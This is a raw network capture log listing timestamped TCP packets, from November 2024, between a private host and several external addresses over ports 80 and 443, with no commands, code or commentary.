Nov 26, 2024 00:25:44.499984026 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.499999046 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.500045061 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.501132011 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.501143932 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.501182079 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.502326965 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.502340078 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.502382994 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.503385067 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.503448963 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.503772974 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.503819942 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.504555941 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.504611015 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.505526066 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.505573988 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.505819082 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.505831003 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.505873919 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.506912947 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.506995916 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.507030010 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.507210016 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.508109093 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.508157015 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.508177042 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.508210897 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.555888891 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:44.659091949 CET	443	49853	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:44.659215927 CET	49853	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:44.660515070 CET	443	49854	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:44.660588026 CET	49854	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:44.664783955 CET	49854	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:44.664786100 CET	443	49852	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:44.664796114 CET	443	49854	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:44.664858103 CET	49852	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:44.665324926 CET	443	49854	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:44.665386915 CET	49854	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:44.668576002 CET	49853	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:44.668600082 CET	443	49853	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:44.668852091 CET	443	49853	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:44.670772076 CET	49852	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:44.670775890 CET	443	49852	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:44.670818090 CET	49853	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:44.671072006 CET	443	49852	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:44.671123028 CET	49852	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:44.672645092 CET	49852	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:44.672647953 CET	49853	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:44.672676086 CET	443	49852	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:44.672678947 CET	443	49853	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:44.674585104 CET	49854	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:44.675158024 CET	443	49854	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:44.675786972 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:44.676553011 CET	443	49851	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:44.677021027 CET	49851	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:44.677031040 CET	443	49851	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:44.677501917 CET	49851	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:44.677509069 CET	443	49851	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:44.727746964 CET	443	49856	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:44.729640007 CET	49856	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:44.729671955 CET	443	49856	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:44.730182886 CET	49856	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:44.730189085 CET	443	49856	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:44.746381044 CET	443	49857	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:44.747174978 CET	49857	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:44.747205973 CET	443	49857	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:44.747665882 CET	49857	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:44.747670889 CET	443	49857	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:45.002908945 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.002968073 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.003026962 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.003432989 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.003479958 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.003519058 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.003674984 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.004595041 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.004654884 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.004690886 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.004767895 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.005728960 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.005774975 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.005919933 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.005963087 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.007628918 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.007740021 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.007775068 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.008419037 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.008467913 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.008483887 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.008624077 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.009305954 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.009361982 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.009417057 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.009457111 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.010462046 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.010518074 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.010593891 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.010637999 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.011603117 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.011713028 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.011754036 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.011897087 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.012798071 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.012861013 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.012923002 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.013957977 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.013969898 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.013972998 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.014004946 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.014018059 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.015160084 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.015214920 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.015244961 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.015415907 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.016289949 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.016344070 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.016433001 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.016473055 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.017530918 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.017575979 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.017630100 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.017668962 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.018702030 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.018740892 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.018786907 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.018841028 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.019823074 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.019870996 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.019912958 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.019949913 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.021064043 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.021105051 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.021181107 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.021219015 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.022253036 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.022296906 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.022346020 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.022383928 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.023349047 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.023401976 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.023433924 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.023473024 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.024538040 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.024606943 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.024620056 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.024672985 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.025703907 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.025769949 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.025804996 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.026068926 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.026906967 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.026968002 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.027019024 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.027143955 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.028072119 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.028141975 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.028268099 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.028318882 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.029222012 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.029289961 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.029339075 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.029386044 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.030414104 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.030455112 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.030575991 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.030636072 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.031569958 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.031615973 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.031718969 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.031758070 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.032737017 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.032807112 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.032841921 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.033041954 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.033899069 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.033946991 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.034008026 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.034045935 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.035079956 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.035131931 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.035168886 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.035324097 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.036242962 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.036298037 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.036349058 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.036433935 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.037450075 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.037545919 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.037550926 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.037595987 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.038688898 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.038701057 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.038754940 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.039849043 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.039891958 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.039932013 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.039999962 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.040939093 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.040991068 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.041202068 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.041744947 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.042177916 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.042222977 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.042267084 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.042610884 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.043298960 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.043348074 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.043448925 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.043504000 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.044528008 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.044604063 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.044630051 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.044717073 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.045622110 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.045675039 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.045753956 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.045799971 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.046809912 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.046857119 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.046955109 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.047008991 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.048042059 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.048091888 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.048130989 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.048171043 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.049185991 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.049240112 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.049284935 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.049380064 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.050342083 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.050493956 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.050529957 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.050529957 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.051548004 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.051595926 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.051714897 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.051767111 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.052748919 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.052800894 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.052856922 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.052896023 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.053895950 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.053941011 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.054009914 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.054056883 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.055028915 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.055126905 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.055175066 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.056243896 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.056301117 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.056325912 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.056364059 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.057434082 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.057483912 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.057487011 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.057542086 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.058623075 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.058725119 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.058767080 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.059756041 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.059819937 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.059931040 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.059969902 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.060923100 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.060981989 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.061023951 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.061099052 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.062227011 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.062283993 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.062336922 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.062377930 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.063246965 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.063293934 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.063339949 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.063384056 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.064456940 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.064516068 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.064529896 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.064563990 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.159461975 CET	443	49851	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:45.159535885 CET	443	49851	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:45.159584045 CET	49851	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:45.160654068 CET	49851	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:45.160674095 CET	443	49851	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:45.160689116 CET	49851	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:45.160695076 CET	443	49851	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:45.170902014 CET	49867	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:45.170938969 CET	443	49867	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:45.171010971 CET	49867	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:45.171359062 CET	49867	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:45.171371937 CET	443	49867	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:45.198182106 CET	443	49856	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:45.198257923 CET	443	49856	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:45.198466063 CET	49856	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:45.199243069 CET	49856	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:45.199265003 CET	443	49856	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:45.199276924 CET	49856	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:45.199284077 CET	443	49856	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:45.204078913 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.204150915 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.204181910 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.204242945 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.204615116 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.204675913 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.204766035 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.204829931 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.205847979 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.205868006 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.205904007 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.205921888 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.206979990 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.207072973 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.207082987 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.207109928 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.208195925 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.208208084 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.208270073 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.209341049 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.209398985 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.209500074 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.209558010 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.210504055 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.210547924 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.210611105 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.210782051 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.211707115 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.211759090 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.211792946 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.212006092 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.212871075 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.212938070 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.212948084 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.213027000 CET	49868	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:45.213044882 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.213063002 CET	443	49868	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:45.213124990 CET	49868	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:45.213329077 CET	49868	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:45.213344097 CET	443	49868	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:45.214056015 CET	80	49795	185.215.113.206	192.168.2.6
